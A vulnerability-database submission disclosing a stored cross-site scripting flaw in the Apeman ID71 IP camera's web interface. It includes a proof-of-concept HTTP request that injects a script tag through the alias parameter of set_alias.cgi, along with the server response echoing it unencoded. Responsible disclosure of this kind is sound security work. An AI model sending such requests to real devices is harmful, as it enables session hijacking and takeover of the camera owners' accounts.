إرسال #668771: Apeman IP CAMERA Model ID71 appversion: EN75.8.53.20 Cross Site Scriptingالمعلومات

عنوان	Apeman IP CAMERA Model ID71 appversion: EN75.8.53.20 Cross Site Scripting
الوصف	The camera’s web interface does not properly encode the user-supplied `alias` value before embedding it into JavaScript. When `alias` is set via `set_alias.cgi`, it is stored and later emitted by `get_status.cgi` as a JavaScript string without context-appropriate encoding. An authenticated attacker can inject arbitrary JavaScript that will execute in the browser of any user viewing pages that consume this variable, enabling session hijacking and unauthorized actions within the victim’s session. To store the XSS we can use the following request: # Request GET /set_alias.cgi?alias=%3Cscript%3Ealert(1)%3C%2Fscript%3E&next_url=alias.htm&loginuse=admin&loginpas=XXXXXXXX HTTP/1.1 Host: 192.168.1.151:53370 To retrieve the stored value use the following request: # Request GET /get_status.cgi HTTP/1.1 Host: 192.168.1.151:53370 ..... # Response: HTTP/1.1 200 OK Date: Sat Oct 4 11:52:04 2025 Server: GoAhead-Webs var alias="<script>alert(1)</script>"; var deviceid="VSTD1744XXXXX"; var sys_ver="x.x.x.x"; var app_version="EN75.8.53.20"; var oem_id="XXXX"; var now=17595XXXXXX; ...SNIP.... Impact - Confidentiality: High — theft of session tokens, credentials, and configuration data - Integrity: High — arbitrary actions in the victim’s authenticated context (change settings, add users) Additional information and images: https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/XSS/XSS-Info.md Vendor status: The vendor APEMAN no longer sells this camera model. It appears to have been discontinued or rebranded. Attempts to contact the vendor were unsuccessful. From my research, it seems that Apeman no longer sells or officially supports security cameras, including the Model ID71. Their current official website (https://apemans.com) focuses exclusively on projectors and dashcams, with no mention of their legacy IP camera line. Because of this, there is no longer an active vendor website or support portal that references the ID71 camera. Historical product information is only available through third-party sources (e.g., archived sales pages, second-hand listings, and user forums).
المصدر	⚠️ https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/XSS/apeman_id71_xss_poc.py
المستخدم	juliourena (UID 90207)
ارسال	04/10/2025 03:01 PM (8 أشهر منذ)
الاعتدال	16/10/2025 01:29 PM (12 days later)
الحالة	تمت الموافقة
إدخال VulDB	328797 [Apeman ID71 EN75.8.53.20 /set_alias.cgi alias البرمجة عبر المواقع]
النقاط	20

التالي ▸نظرة عامة ◂ السابق

Interested in the pricing of exploits?

See the underground prices here!